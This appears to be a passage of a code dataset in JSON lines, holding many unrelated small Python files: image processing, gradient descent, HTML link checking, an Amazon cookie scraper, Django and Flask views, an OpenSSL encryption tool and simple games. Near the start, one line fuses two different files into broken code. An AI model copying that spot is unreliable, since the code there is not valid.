3\r\ndef getSFZ(img,threshold_w = [15,1200],threshold_h = [0,200],threshold_data = [50,200],threshold_xmin=[400,1400],threshold_ymin=[800,1000]):\r\n \"\"\"\r\n 用于定位¥符号位置\r\n img : 原始cv读取的图像\r\n threshold_w : ¥宽度范围\r\n threshold_h : ¥高度范围\r\n threshold_xmin : ¥出现的位置范围\r\n \"\"\"\r\n img_gray = img[:,:,0]\r\n ret, binary = cv2.threshold(img_gray,115,255,cv2.THRESH_BINARY)\r\n cnts, hierarchy = cv2.findContours(binary.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n positions = []\r\n for index,c in enumerate(cnts):\r\n x,y,w,h = cv2.boundingRect(c)\r\n xmin,ymin,xmax,ymax = x,y,x+w,y+h\r\n if threshold_xmin[0]1e-14 :\n count=count+1\n step=gradient(*state)\n state=state-0.1*step\n error_value[0]=error(*state)\n return state,count\n\ndef coord_descent():\n state=np.array([1,1],dtype=np.float128)\n count=0\n error_value=np.array([1],dtype=np.float128)\n while count<15:\n count=count+1\n\n step1x,step1y=gradient(*state)\n state=state-0.1*np.array([step1x,0],dtype=np.float128)\n step2x,step2y=gradient(*state)\n state=state-0.1*np.array([0,step2y],dtype=np.float128)\n error_value[0]=error(*state)\n return error_value \n","repo_name":"bbli/CS156-Code","sub_path":"Gradient-Descent/GradDescent.py","file_name":"GradDescent.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11553475765","text":"from bs4 import BeautifulSoup, SoupStrainer\nfrom collections import deque\nfrom pathlib import Path\n\nclass Page():\n \"\"\"\n Object organizing the link information in the archeaopteryx pages\n \"\"\"\n\n def __init__(self, path):\n \"\"\"\n instance variables:\n name -- file name with extension\n page_type -- home, about, archive or article\n ing_home -- link anchored to the archeaopteryx image\n home -- link anchored to 'home' in the menu bar\n archive -- link anchored to 'archive' in the menu bar\n about -- link anchored to 'about' in the menu bar\n rss -- link anchored to 'rss' in the menu bar\n \"\"\"\n self.name = path.name\n self.page_type = self.get_page_type(self.name)\n self.img_home, self.home, self.archive, self.about, self.rss = self.get_header_links(path)\n\n def get_page_type(self, name):\n '''\n Return if page is home, about, archive, or an article\n '''\n dict = {\"index.html\": \"home\", \"about.html\": \"about\", \"archive.html\": \"archive\"}\n return dict.get(name, \"article\")\n\n def get_header_links(self, path):\n only_header = SoupStrainer(\"header\")\n dict = {\"img_home\": \"archea-container\", \"home\": \"home\", \"archive\": \"archive\", \"about\": \"about\", \"rss\": \"rss\"}\n with open(path) as f:\n soup = BeautifulSoup(f, \"html.parser\", parse_only=only_header)\n for key in dict:\n div = soup.find('div', dict[key])\n if not div is None:\n try:\n anchor = next(div.children)\n dict[key] = anchor.get('href')\n except StopIteration:\n dict[key] = None\n else:\n dict[key] = None\n links = (dict[\"img_home\"], dict[\"home\"], dict[\"archive\"], dict[\"about\"], dict[\"rss\"])\n return links\n\n\nclass ArticlePage(Page):\n \"\"\"\n Extends Page class to include Navigation links and header ids\n \"\"\"\n\n def __init__(self, path):\n \"\"\"\n instance variables:\n nav_refs -- deque of all links in the navigation bar\n header_ids -- deque of all ids in h1, h2 and h3 elements\n\n other instance variables inherited from Page class\n \"\"\"\n self.nav_refs = self.get_nav_links(path)\n self.header_ids = self.get_h_ids(path)\n Page.__init__(self, path)\n\n\n def get_nav_links(self, path):\n only_toc = SoupStrainer('li')\n nav_refs = deque()\n with open(path) as f:\n soup = BeautifulSoup(f, 'html.parser', parse_only=only_toc)\n anchor_list = soup.find_all('a')\n for anchor in anchor_list:\n nav_refs.append(anchor.get('href'))\n return nav_refs\n\n def get_h_ids(self, path):\n only_headers = SoupStrainer(['h1', 'h2', 'h3', 'h4'])\n header_ids = deque()\n with open(path) as f:\n soup = BeautifulSoup(f, 'html.parser', parse_only=only_headers)\n for ref in soup:\n if ref.string == \"Contents:\":\n continue\n id = ref.get('id')\n id = \"#\" + str(id)\n header_ids.append(id)\n return header_ids\n\n\n\nclass ArchivePage(Page):\n\n def __init__(self, path):\n self.article_links = self.get_article_links(path)\n Page.__init__(self, path)\n\n def get_article_links(self, path):\n only_article_links = SoupStrainer('li', {'class':\"archive-li\"} )\n article_links = deque()\n with open(path) as f:\n soup = BeautifulSoup(f, 'html.parser', parse_only=only_article_links)\n for ref in soup:\n try:\n anchor = next(ref.children)\n article_links.append(anchor.get('href'))\n except StopIteration:\n pass\n return article_links\n","repo_name":"archeaopteryx/archeaopteryx.github.io","sub_path":"tests/pageObjects.py","file_name":"pageObjects.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25365783866","text":"# -*- coding: utf-8-sig -*-\n\"\"\"\nFile Name : get_amazon_cookies\nAuthor : Eric\nCreate date : 2020/11/27\n\"\"\"\nfrom Amazon.ArriveDate.bin.mongo_config import *\nfrom Amazon.ArriveDate.settings.settings import *\nfrom Amazon.ArriveDate.bin.start_chrome_drive import *\nfrom Amazon.ArriveDate.functions.change_postal_code import *\nimport pandas as pd\nimport random\nimport time\nimport re\n\n\ndef update_us_selenium_cookies():\n '''\n 随机选取ASIN及美国城市邮编,更新在线数据库中的Amazon美国站邮编\n '''\n c_date = get_current_date()\n cookie_db_col = hs_mongo_config(col_name=us_cookie_col_name_prefix + c_date, db_name=us_cookie_db_name)\n postal_code_col = hs_mongo_config(col_name=us_postal_code_col,db_name=us_cookie_db_name)\n asin_list = pd.DataFrame(hs_mongo_config(col_name=us_url_check_asin,db_name=us_cookie_db_name).find())['ASIN'].tolist()\n postal_code_list = pd.DataFrame(postal_code_col.find())[\"PostalCode\"].tolist()\n\n for i in range(update_cookie_num):\n driver = switch_to_browser(img_load=chrome_load_imd, headless=False)\n asin = random.choice(asin_list)\n url = r'https://www.amazon.com/dp/' + asin\n driver.get(url)\n time.sleep(2)\n change_postal_code(driver,random.choice(postal_code_list))\n time.sleep(3)\n cookies = driver.get_cookies()\n save_to_mongo(cookie_db_col,{'cookie':cookies})\n driver.quit()\n\n\ndef get_postal_code_list():\n postal_code_col = hs_mongo_config(col_name=us_postal_code_col, db_name=us_cookie_db_name)\n postal_code_list = pd.DataFrame(postal_code_col.find())[\"PostalCode\"].tolist()\n return postal_code_list\n\n\ndef select_latest_us_cookies_col():\n '''\n 找出最近一次更新的cookie collection\n '''\n us_cookie_db = hs_db_info(us_cookie_db_name)\n col_list = us_cookie_db.collection_names()\n date_list = []\n for collec in col_list:\n if not re.match(us_cookie_col_name_prefix,collec): continue\n date_list.append(int(re.search(us_cookie_col_name_suffix_pattern,collec).group()))\n return us_cookie_col_name_prefix + str(max(date_list))\n\n\ndef get_us_cookies():\n '''获取一个随机的Amazon美国站cookie'''\n col_name = select_latest_us_cookies_col()\n db_col = hs_mongo_config(db_name=us_cookie_db_name,col_name=col_name)\n cookies_list = pd.DataFrame(db_col.find())['cookie'].tolist()\n return random.choice(cookies_list)\n\ndef get_us_cookie_list():\n '''返回Amazon美国站cookie列表'''\n col_name = select_latest_us_cookies_col()\n db_col = hs_mongo_config(db_name=us_cookie_db_name, col_name=col_name)\n cookies_list = pd.DataFrame(db_col.find())['cookie'].tolist()\n return cookies_list\n\nif __name__ == '__main__':\n # update_us_selenium_cookies()\n print(select_latest_us_cookies_col())","repo_name":"Eric-top1cn/AmazonSpider","sub_path":"ArriveDate/functions/update_us_amazon_cookies.py","file_name":"update_us_amazon_cookies.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12474566883","text":"from django.contrib import messages\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .forms import MyUserCreationForm, UserDetailForm\n\n\ndef register(request):\n if request.method == 'POST':\n form = MyUserCreationForm(request.POST, prefix='uf')\n user_detail_form = UserDetailForm(request.POST, prefix='ud')\n\n if form.is_valid() and user_detail_form.is_valid():\n # check if phone number already exists\n phone_number = user_detail_form.cleaned_data['phone_number']\n if User.objects.filter(username=phone_number).exists():\n messages.info(request, 'This phone number has already been used. Please provide an alternate phone number.', extra_tags='alert alert-info alert-dismissible')\n return render(request, 'account/register.html', {'form': form, 'user_detail_form': user_detail_form})\n\n new_user = form.save(commit=False)\n new_user.username = phone_number\n new_user.save()\n user_detail_form.save(new_user)\n messages.info(request, 'You have been registered on this portal. Login to continue.', extra_tags='alert alert-info alert-dismissible')\n return redirect('account:login')\n else:\n form = MyUserCreationForm(prefix='uf')\n user_detail_form = UserDetailForm(prefix='ud') # form to collect additional information from the user\n return render(request, 'account/register.html', {'form': form, 'user_detail_form': user_detail_form})\n\n\ndef logout_view(request):\n logout(request)\n return redirect('home')\n","repo_name":"simplywhiz/PaydeskGit","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21100390683","text":"'''\nAuthor: Jason\nDate: 2023-07-28 10:10:33\nLastEditors: Jason\nLastEditTime: 2023-08-02 08:30:21\nFilePath: file_encryption/encryption.py\n'''\n\nimport os\nimport sys\nimport datetime\nimport subprocess\n\nbase_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\nssl_exe_path = os.path.join(base_path, 'openssl-3', 'x86/bin/openssl.exe')\n\ndef finish_func():\n print(\"----------------------------------------------------\\n\")\n input(\"按任意键退出...\")\n exit(0)\n\ndef print_errinfo(cmd, result):\n if cmd: print(f\"\\033[0;31m 命令: {' '.join(cmd)} \\033[0m\")\n print(f\"\\033[0;31m 错误信息: {result.stderr} \\033[0m\")\n finish_func()\n\ndef add_privkey():\n args = [ssl_exe_path, 'genrsa', '-out', 'rsa_private_key.pem', '2048']\n result = subprocess.run(args, capture_output=True, text=True)\n if result.returncode != 0:\n print(f\"\\033[0;31m 生成私钥文件失败! \\033[0m\")\n print_errinfo(result=result)\n return True\n\ndef add_pubkey():\n args = [ssl_exe_path, 'rsa', '-in', 'rsa_private_key.pem', '-pubout', '-out', 'rsa_public_key.pem']\n result = subprocess.run(args, capture_output=True, text=True)\n if result.returncode != 0:\n print(f\"\\033[0;31m 生成公钥文件失败! \\033[0m\")\n print_errinfo(result=result)\n return True\n\ndef fix_input(file_path, key_path):\n if file_path == \"key.bin.enc\":\n temp_file_path = file_path\n file_path = key_path\n key_path = temp_file_path\n return file_path, key_path\n\ndef encrypt_file(file_path):\n print(f\"\\033[0;32m 正在加密文件:{file_path} \\033[0m\")\n create_key = [ssl_exe_path, 'rand', '-base64', '32']\n result = subprocess.run(create_key, capture_output=True, text=True)\n if result.returncode != 0:\n print(f\"\\033[0;31m 生成随机密钥失败! \\033[0m\")\n print_errinfo(result=result)\n key = result.stdout\n with open('key.bin', 'w') as f:\n f.write(key)\n\n cmd1 = [ssl_exe_path, 'enc', '-aes-256-cbc', '-salt', '-in', file_path, '-out', file_path + '.enc', '-pass', 'file:./key.bin']\n cmd2 = [ssl_exe_path, 'pkeyutl', '-encrypt', '-inkey', './rsa_public_key.pem', '-pubin', '-in', './key.bin', '-out', 'key.bin.enc']\n for cmd in [cmd1, cmd2]:\n result = subprocess.run(cmd, capture_output=True, text=True)\n if result.returncode != 0:\n print(f\"\\033[0;31m 命令执行失败! \\033[0m\")\n print_errinfo(cmd, result)\n os.remove('key.bin')\n print(f\"\\033[0;32m 加密文件成功! \\033[0m\")\n\ndef decrypt_file(file_path, key_path):\n print(f\"\\033[0;32m 正在解密文件:{file_path} \\033[0m\")\n fix_input(file_path, key_path)\n file_name = file_path[:-4]\n cmd1 = [ssl_exe_path, 'pkeyutl', '-decrypt', '-inkey', './rsa_private_key.pem', '-in', key_path, '-out', 'key.bin']\n cmd2 = [ssl_exe_path, 'enc', '-d', '-aes-256-cbc', '-in', file_path, '-out', file_name, '-pass', 'file:./key.bin']\n for cmd in [cmd1, cmd2]:\n result = subprocess.run(cmd, capture_output=True, text=True)\n if result.returncode != 0:\n print(f\"\\033[0;31m 命令执行失败! \\033[0m\")\n print_errinfo(cmd, result)\n os.remove('key.bin')\n print(f\"\\033[0;32m 解密文件成功! \\033[0m\")\n\ndef keys_info():\n priv_mtime = os.path.getmtime('rsa_private_key.pem')\n priv_size = os.path.getsize('rsa_private_key.pem')\n priv_ctime = datetime.datetime.fromtimestamp(priv_mtime).strftime(\"%Y-%m-%d %H:%M:%S\")\n pub_mtime = os.path.getmtime('rsa_public_key.pem')\n pub_size = os.path.getsize('rsa_public_key.pem')\n pub_ctime = datetime.datetime.fromtimestamp(pub_mtime).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n print(f\"\\033[0;34m 私钥文件大小:{priv_size} ,创建日期:{priv_ctime} \\033[0m\")\n print(f\"\\033[0;34m 公钥文件大小:{pub_size} ,创建日期:{pub_ctime} \\033[0m\")\n\ndef modify_keys():\n if not os.path.isfile('rsa_private_key.pem') or input('是否重新生成私钥?(y/n)') == 'y':\n add_privkey()\n print(f\"\\033[0;32m 私钥文件已生成! \\033[0m\")\n\n add_pubkey()\n print(f\"\\033[0;32m 公钥文件已生成! \\033[0m\")\n keys_info()\n\n finish_func()\n\ndef check_keys():\n if not os.path.isfile('rsa_public_key.pem') or not os.path.isfile('rsa_private_key.pem'):\n print(\"检测到密钥文件不存在,正在生成密钥文件...\")\n modify_keys()\n else:\n print(\"----------------------------------------------------\\n\\\n文件加解密工具\\n\\\n使用方法:\\n\\\n将需要加解密的文件拖拽到本程序图标中,即可完成加解密\\n\\\n直接运行将检测密钥文件是否存在,不存在则将生成\\n\\\n----------------------------------------------------\\n\")\n keys_info()\n if input('----------------------------------------------------\\n\\\n检测到密钥文件存在,是否重新生成?(y/任意退出)') == 'y':\n modify_keys()\n exit(0)\n\ndef check_files(model):\n if model == 'encrypt' and not os.path.isfile('rsa_public_key.pem'):\n print(f\"\\033[0;31m 公钥文件不存在! \\033[0m\")\n finish_func()\n elif model == 'decrypt' and not os.path.isfile('rsa_private_key.pem'):\n print(f\"\\033[0;31m 私钥文件不存在! \\033[0m\")\n finish_func()\n\ndef check_model():\n if len(sys.argv) == 1:\n check_keys()\n elif len(sys.argv) == 2:\n check_files(\"encrypt\")\n encrypt_file(sys.argv[1])\n else:\n check_files(\"decrypt\")\n decrypt_file(sys.argv[1], sys.argv[2])\n\ncheck_model()\n ","repo_name":"Jason824040945/encryption","sub_path":"encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":5570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73894392783","text":"from typing import Union, List, Dict\n\nfrom discord import Embed\n\nfrom config import (\n COMMAND_PREFIX,\n GCE_TARGET_INSTANCE_ZONE\n)\nfrom src.discord.embed.factory.base.gce import GCEEmbedFactoryBase\nfrom src.discord.embed.util.create_embed import create_embed\nfrom src.gce.type.instance import GCEInstanceRepresentingWrapper\n\n\nclass InstanceListEmbedFactory(GCEEmbedFactoryBase):\n def __init__(\n self,\n instances: List[GCEInstanceRepresentingWrapper],\n zone: str = GCE_TARGET_INSTANCE_ZONE\n ):\n self.__instances: List[GCEInstanceRepresentingWrapper] = instances\n self.__zone: str = zone\n\n def _get_fields(self) -> List[Dict[str, Union[str, bool]]]:\n fields: List[Dict[str, Union[str, bool]]] = list()\n\n for instance in self.__instances:\n fields.append(\n {\n \"name\": f\"{instance.get_status_icon()}: `{instance.name}`\",\n \"value\": f\"**{instance.status}**\",\n \"inline\": False\n }\n )\n\n return fields\n\n def make(self) -> Embed:\n FOOTER: str = f\"`{COMMAND_PREFIX}\" \" \" \"{start | stop} ${instance_name}\" \"` \" \"でインスタンスを操作できます\"\n\n title: str = f'\"{self.__zone}\" にあるインスタンスの一覧'\n fields: List[Dict[str, Union[str, bool]]] = self._get_fields()\n\n embed = create_embed(\n title=title,\n color=self._EMBED_COLOR,\n author_name=self._AUTHOR_NAME,\n author_url=self._AUTHOR_URL,\n author_icon_url=self._AUTHOR_ICON_URL,\n thumbnail_url=self._THUMBNAIL_URL,\n footer=FOOTER,\n fields=fields\n )\n\n return embed\n","repo_name":"Colk-tech/gcpdiscord","sub_path":"src/discord/embed/factory/instance_list.py","file_name":"instance_list.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"25602245705","text":"###############################################################################\n# For when your barcodes correspond to the wrong samples!\n#\n# Make sure this is executed from the run directory.\n#\n# Ensure the input file is named \"sample_data.txt\" and is in the same\n# directory, with 4 tab-separated columns corresponding to:\n# 0: old sample number\n# 1: new sample number\n# 2: old sample name\n# 3: new sample name\n\nimport os\nimport subprocess\nimport re\nimport sys\n\nimport dir_tools\n\n\ndef mv_rename(old, new):\n try:\n subprocess.check_call([\"mv\",\n old,\n new])\n except:\n log(old + \" name not changed\")\n\n log(old + \" renamed to \" + new)\n\n\n# error logging\ndef log(message):\n with open(os.path.join('./', 'renaming_log.txt'), 'a') as datafile:\n datafile.write(message + \"\\n\")\n datafile.close()\n\n\n# Reads the input sample information and creates a dictionary for both sample\n# names and sample numbers separately.\ndef read_dicts():\n sample_names = dict()\n sample_nums = dict()\n\n with open(os.path.join('./', 'sample_data.txt'), 'r') as datafile:\n for line in datafile:\n line_list = line.split(\"\\t\")\n sample_nums[line_list[0]] = line_list[1]\n sample_names[line_list[2]] = line_list[3].strip(\"\\n\")\n datafile.close()\n\n return (sample_names, sample_nums)\n\n\ndef main():\n\n (sample_names, sample_nums) = read_dicts()\n\n if sample_names and sample_nums:\n print(\"dictionary populated.\")\n\n run = dir_tools.get_run_info(sys.argv)\n\n for dirname in os.listdir(run[\"path\"]):\n # To check it is dir, not file\n if os.path.isdir(run[\"path\"] + dirname):\n bcpath = (run[\"path\"] + dirname +\n \"/Data/Intensities/BaseCalls/\")\n\n # Matching sample name for renaming directory and FastQ files\n # Assumes Illumina numeric ID is at least 8 digits long\n name_re = re.match(r\"([\\S*\\s*]*[A|B])-\\d\\d\\d\\d\\d\\d\\d\\d+\\Z\",\n dirname)\n old_sample_name = \"\"\n\n for filename in os.listdir(bcpath):\n # Renaming FastQ files (sample name and number)\n num_re = re.match(r\"\\S*_S(\\d+)\\S*\",\n filename)\n\n if name_re:\n old_sample_name = name_re.group(1)\n old_num = num_re.group(1)\n\n new_sample_name = sample_names.get(old_sample_name)\n new_num = sample_nums.get(old_num)\n\n new_fastq = re.sub(\n r\"([\\S*\\s*]*)(_S)(\\d+)(_L001_R\\d+_001.fastq.gz)\\Z\",\n new_sample_name + r\"\\g<2>\" + str(new_num) +\n r\"\\g<4>\",\n filename)\n\n if filename != new_fastq:\n mv_rename(bcpath + filename,\n bcpath + new_fastq)\n\n else:\n log(dirname + \" name not changed\")\n\n # Renaming directory (sample name)\n if name_re:\n old_name = name_re.group(1)\n new_name = sample_names.get(old_name)\n\n new_dirname = re.sub(\n r\"([\\S*\\s*]*[A|B])(-\\d\\d\\d\\d\\d\\d\\d\\d+)\\Z\",\n new_name + r\"\\g<2>\",\n dirname)\n\n if dirname != new_dirname:\n mv_rename(run[\"path\"] + dirname,\n run[\"path\"] + new_dirname)\n\n else:\n log(dirname + \" name not changed\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"agutteridge/bioinformatics_bits","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"819173408","text":"from app import mysql\nfrom flask import flash\nfrom werkzeug.utils import secure_filename\nimport os\nfrom cloudinary import uploader\nfrom config import CLOUDINARY_FOLDER\n\nclass student_model:\n @classmethod\n def add_student(cls, id, firstname, lastname, course, year, gender, image_url):\n try:\n cur = mysql.new_cursor(dictionary=True)\n\n # Check if the ID is already taken\n cur.execute(\"SELECT id FROM student WHERE id = %s\", (id,))\n existing_id = cur.fetchone()\n if existing_id:\n flash(\"ID is already taken.\", \"error\")\n return \"Failed to create student\"\n\n # Insert the new student record\n cur.execute(\"INSERT INTO student (id, firstname, lastname, course, year, gender, image_url) VALUES (%s, %s, %s, %s, %s, %s, %s)\",\n (id, firstname, lastname, course, year, gender, image_url))\n mysql.connection.commit()\n \n return \"Student created successfully\"\n \n except Exception as e:\n flash(\"Failed to create student(models 1).\", \"error\")\n return \"Failed to create student\"\n \n @classmethod\n def upload_image(cls,image):\n try:\n # Check if the file has an allowed extension\n allowed_extensions = {'png', 'jpg', 'jpeg'}\n if '.' in image.filename and image.filename.rsplit('.', 1)[1].lower() in allowed_extensions:\n # Check if the file size is 1MB or less\n max_file_size_mb = 1.0\n max_file_size_bytes = max_file_size_mb * 1024 * 1024 # 1MB = 1024KB = 1024 * 1024 bytes\n\n if len(image.read()) <= max_file_size_bytes:\n # Reset the file pointer to the beginning for uploading\n image.seek(0)\n\n # Generate a secure filename\n filename = secure_filename(image.filename)\n\n # Upload the file to Cloudinary\n response = uploader.upload(image, folder=CLOUDINARY_FOLDER) # Set the folder as needed\n\n # Return the Cloudinary URL of the uploaded image\n return response['secure_url']\n else:\n flash(\"File size exceeds the maximum allowed limit (1MB).\", \"error\")\n return None\n else:\n flash(\"Invalid file type. Please upload a valid image file (allowed types: png, jpg, jpeg).\", \"error\")\n return None\n\n except Exception as e:\n flash(\"Failed to upload image. Please try again.\", \"error\")\n return None\n \n @classmethod\n def get_students(cls):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT s.*, col.name AS college_name, col.code AS college_code FROM student s JOIN course c ON s.course = c.code INNER JOIN college col ON c.college = col.code\")\n course = cur.fetchall()\n return course\n \n @classmethod\n def search_students_by_id(cls, search_query):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT * FROM student WHERE id LIKE %s\", (f\"%{search_query}%\",))\n students = cur.fetchall()\n cur.close()\n return students\n\n @classmethod\n def search_students_by_firstname(cls, search_query):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT * FROM student WHERE firstname LIKE %s\", (f\"%{search_query}%\",))\n students = cur.fetchall()\n cur.close()\n return students\n\n @classmethod\n def search_students_by_lastname(cls, search_query):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT * FROM student WHERE lastname LIKE %s\", (f\"%{search_query}%\",))\n students = cur.fetchall()\n cur.close()\n return students\n\n @classmethod\n def search_students_by_course(cls, search_query):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT * FROM student WHERE course LIKE %s\", (f\"%{search_query}%\",))\n students = cur.fetchall()\n cur.close()\n return students\n\n @classmethod\n def search_students_by_year(cls, search_query):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT * FROM student WHERE year LIKE %s\", (f\"%{search_query}%\",))\n students = cur.fetchall()\n cur.close()\n return students\n\n @classmethod\n def search_students_by_gender(cls, search_query):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT * FROM student WHERE gender LIKE %s\", (f\"%{search_query}%\",))\n students = cur.fetchall()\n cur.close()\n return students\n \n @classmethod\n def search_students_by_college(cls, search_query):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT s.*, col.name AS college_name, col.code AS college_code FROM student s JOIN course c ON s.course = c.code INNER JOIN college col ON c.college = col.code WHERE c.college = %s\", (search_query,))\n students = cur.fetchall()\n cur.close()\n return students\n \n @classmethod\n def update_student(cls, student_id, new_id, new_firstname, new_lastname, new_course, new_year, new_gender, new_image_url):\n try:\n cur = mysql.new_cursor(dictionary=True)\n\n # Check if the new ID is already taken (excluding the current student's ID)\n cur.execute(\"SELECT id FROM student WHERE id = %s AND id != %s\", (new_id, student_id))\n existing_id = cur.fetchone()\n if existing_id:\n flash(\"ID is already taken.\", \"error\")\n return \"Failed to update student\"\n\n # Update the student record\n cur.execute(\"UPDATE student SET id=%s, firstname=%s, lastname=%s, course=%s, year=%s, gender=%s, image_url=%s WHERE id=%s\",\n (new_id, new_firstname, new_lastname, new_course, new_year, new_gender, new_image_url, student_id))\n mysql.connection.commit()\n return \"Student updated successfully\"\n except Exception as e:\n return \"Failed to update student\"\n\n @classmethod\n def get_student_by_id(cls, student_id):\n try:\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT * FROM student WHERE id = %s\", (student_id,))\n student = cur.fetchone()\n cur.close()\n return student\n except Exception as e:\n flash(\"Failed to get student by ID.\", \"error\")\n return None\n \n @classmethod\n def delete_student(cls, student_id):\n try:\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"DELETE FROM student WHERE id = %s\", (student_id,))\n mysql.connection.commit()\n cur.close()\n return {\"success\": True, \"message\": \"Course deleted successfully\"}\n except Exception as e:\n return {\"success\": False, \"message\": str(e)}","repo_name":"lalalance12/SSIS-Website","sub_path":"app/models/student_m.py","file_name":"student_m.py","file_ext":"py","file_size_in_byte":7043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"41704752334","text":"class Player:\n \"\"\"A class of a citizen player.\n\n Args:\n name (str): The name of the player in the Telegram.\n userid (int): The userid of the player in the Telegram.\n\n Attributes:\n name (str): The name of the player in the Telegram.\n _is_alive (bool): If the player is still alive.\n _role (str): The role of the player in the game.\n userid (int): The userid of the player in the Telegram.\n _voted (bool): If the player had already voted in this turn.\n \"\"\"\n def __init__(self, name: str, userid: int):\n self.name: str = name\n self._is_alive: bool = True\n self._role: str = 'citizen'\n self.userid: int = userid\n self._voted: bool = False\n self._emoji: str = '\\U0001F477'\n\n def __str__(self):\n return f'{self.name}, {self._role} {self._emoji}'\n\n\nclass Murderer(Player):\n def __init__(self, name: str, userid: int):\n super().__init__(name, userid)\n self._role: str = 'murderer'\n self._detained: bool = False\n self._emoji: str = '\\U0001F9DB'\n\n @staticmethod\n def kill(player: Player) -> None:\n \"\"\"Kill a player.\"\"\"\n player._is_alive = False\n\n\nclass Policeman(Player):\n def __init__(self, name: str, userid: int):\n super().__init__(name, userid)\n self._role: str = 'policeman'\n self._emoji: str = '\\U0001F46E'\n\n @staticmethod\n def detain(player: Player) -> bool:\n \"\"\"Check if the detained player is the murderer.\"\"\"\n if isinstance(player, Murderer):\n player._detained = True\n return True\n return False\n","repo_name":"orronai/burningtown","sub_path":"models/players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5771613980","text":"import re\r\n\r\n\r\ndef get_counts(filename):\r\n line_count = 0\r\n word_count = 0\r\n with open(filename, \"r\") as f:\r\n line = f.readline()\r\n while line != \"\":\r\n line_count += 1\r\n word_count += len(re.findall(r'\\w+', line))\r\n line = f.readline()\r\n\r\n return line_count, word_count\r\n\r\n\r\n# Driver code\r\nfilename = input(\"Enter file name: \")\r\nline_count, word_count = get_counts(filename)\r\nprint(\"number of lines: \", line_count)\r\nprint(\"number of words: \", word_count)\r\n","repo_name":"naveensakthi04/PythonTraining","sub_path":"Exercise2/2_count_words_lines.py","file_name":"2_count_words_lines.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23378575949","text":"\"\"\"Задан двумерный массив:\r\n\r\n square = np.array([ [16, 3, 2, 13],\r\n [5, 10, 11, 8],\r\n [9, 6, 7, 12],\r\n [4, 15, 14, 1]])\r\n Вычислите сумму чисел в каждом столбце, в каждой строке, в каждом квадрате 2×2,\r\n который можно вырезать из имеющегося (5 шт). Выведите её на экран для каждого случая.\"\"\"\r\nimport numpy as np\r\nArray=np.array([ [16, 3, 2, 13], [5, 10, 11, 8],[9, 6, 7, 12],[4, 15, 14, 1]])\r\nrows,cols =Array.shape\r\nsum_rows=[]\r\ndef sum_cols_and_rows(array):\r\n a = 0\r\n ss=0\r\n for i in range(rows): #function that calculated sum of row and column elements\r\n aa=array[i,:]\r\n for j in range(cols):\r\n ss+=aa[j]\r\n sum_rows.append(ss)\r\n ss=0\r\n print('sum of raws or columns is ',sum_rows)\r\n sum_rows.clear()\r\nTArray=Array.transpose()\r\nsum_cols_and_rows(Array)\r\nsum_cols_and_rows(TArray)\r\nsq1=Array[0:2,0:2]\r\nsq2=Array[0:2,2:4]\r\nsq3=Array[2:4,0:2]\r\nsq4=Array[2:4,2:4]\r\nsq5=Array[1:3,1:3]\r\n\r\ndef sum_all_el(array):\r\n x=0\r\n for i in range(2):\r\n for j in range(2):\r\n x+=int(array[i,j])\r\n print(x)\r\n x=0\r\nsum_all_el(sq1)\r\nsum_all_el(sq2)\r\nsum_all_el(sq3)\r\nsum_all_el(sq4)\r\nsum_all_el(sq5)\r\n\r\n\r\n\r\n\r\n","repo_name":"lazyrka/lazyrkindom","sub_path":"spring/lab3/3.3.py","file_name":"3.3.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15842054142","text":"import pygame\nimport sys\nimport random\nfrom pygame.locals import *\n\n# colors\nWHITE = (255,255,255)\nBLACK = (0,0,0)\n\ndef draw_btns (BUTTONS):\n for button ,letter in BUTTONS:\n btn_text = btn_font.render(letter, True, BLACK)\n btn_text_rect = btn_text.get_rect(center=(button.x + SIZE//2, button.y + SIZE//2))\n pygame.draw.rect(screen, BLACK, button,2)\n screen.blit(btn_text, btn_text_rect)\n\n\ndef display_guess():\n display_word = ''\n\n for letter in WORD:\n if letter in GUESSED:\n display_word += f\"{letter} \"\n else:\n display_word += \"_ 